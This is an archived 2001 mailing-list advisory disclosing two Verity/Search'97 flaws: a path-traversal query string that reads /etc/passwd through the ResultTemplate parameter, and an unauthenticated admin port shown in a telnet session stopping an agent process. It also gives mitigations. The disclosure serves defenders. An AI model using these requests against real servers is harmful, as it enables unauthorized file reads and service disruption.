I've mentioned this a couple of weeks back to Verity tech support but unfortunatly nothing has happened since. ++ Intro There are two major security holes in the Verity/Search'97 software. The first one is a simple CGI hack that allows anybody with permission to execute the s97_cgi CGI script to look at files on the webserver. The second security problem is an authorization problem with the tasmgr application. ++ CGI Scripts The s97_cgi and s97r_cgi programs provide an interface for web based applications to the Verity search engine. These two programs typically handle search queries and showing the result of those queries. One of the parameters to the script is one in which you specify the name of a template file that is used to show the result of the search query. This path is relative to a directory that you have to specify in the Verity configuration files. The problem is that this template pathname is appended to the base directory name without proper checking of this path for .. or %2e%2e. This means that it's possible to jump out of the templates directory and use any file on the Verity host as a result template. It will be send back to the client browser in it's original form or with minor modifications if it contained any valid HTMLscript tags (Verity's script language). Sample query: http://www.xxx.com/search97.vts ?HLNavigate=On&querytext=dcm &ServerKey=Primary &ResultTemplate=../../../../../../../etc/passwd &ResultStyle=simple &ResultCount=20 &collection=books Please note that only files can be read for which the owner of the webserver process has permission. ++ Tasmgr The tasmgr process, part of the Agent Server, listens on port 1972 for administrative commands. Unfortunatly this requires no authorization at all, so anybody can start and stop your agent processes. Connected to search97.xxx Escape character is '^]'. 0 Verity dcm ready list 0 TAS-Primary status tas-primary 0 TYPE=PROCESS; STATE=RUNNING; STARTUP=AUTO_START; PID=87632 stop tas-primary 0 'tas-primary' signalled status tas-primary 0 TYPE=PROCESS; STATE=STOPPING; STARTUP=AUTO_START; PID=87632 where 0 /home/verity/_hpux10/bin/dcm.cfg Nothing of this is mentioned in the manuals or online FAQs. ++ Possible solutions For the CGI bug, use a wrapper around the Verity CGIs that checks for .. in the argument part. This can probably also be done with Apache's mod_rewrite. Another solution is to directly call the Verity CGIs from your own CGI scripts. This is my preferred way. The TASMGR problem can simply be blocked with a firewall or router acl. Greetings, Stefan -- Stefan Arentz stefan.arentzat_private / http://www.soze.com/stefan Our future is so bright we've got to wear dark shades !
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:04:25 PDT